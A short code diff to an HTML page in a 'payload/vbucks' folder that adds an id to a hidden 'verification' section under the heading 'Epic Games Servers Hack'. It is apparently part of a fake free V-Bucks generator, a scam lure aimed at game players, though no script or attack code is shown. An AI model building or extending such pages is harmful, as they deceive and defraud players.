--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -111,7 +111,7 @@
                                     </div>
                                 </div>
                                 
-                                <div class="col-lg-12 verification-wrap" style="display: none;">
+                                <div class="col-lg-12 verification-wrap" style="display: none;" id="verification">
                                     <div class="verification col-sm-7 col-xs-9 center-block">
                                         <div class="header-wrap">
                                             <h4 style="font-family: fortnite; font-size: 25px; text-transform: uppercase;">Epic Games Servers Hack</h4>
